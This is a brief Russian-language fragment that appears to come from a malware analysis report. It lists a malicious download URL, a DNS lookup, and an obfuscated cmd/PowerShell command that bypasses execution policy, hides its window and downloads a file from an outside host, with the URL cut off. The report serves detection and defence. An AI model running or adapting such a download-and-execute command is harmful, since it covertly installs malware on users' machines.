Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^OwErshE^l^l^.eXE -exEcu^tiONP^OLI^cY^ ^b^ypAs^s^ ^-^nOp^R^o^Fi^l^e -^Wi^NdoW^ST^Y^le^ hID^DE^n (NE^W-^obj^eCT S^YSTEm.NeT.^W^e^B^c^LI^en^T).^d^oWnLO^ad^Fil^E^(^'http://www....
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "p^OwErshE^l^l^.eXE -exEcu^tiONP^OLI^cY^ ^b^ypAs^s^ ^-^nOp^R^o^Fi^l^e -^Wi^NdoW^ST^Y^le^ hID^DE^n (NE^W-^obj^eCT S^YSTEm.NeT.^W^e^B^c^LI^en^T).^d^oWnLO^ad^Fil^E^(^'http://www....' (со скрытым окном)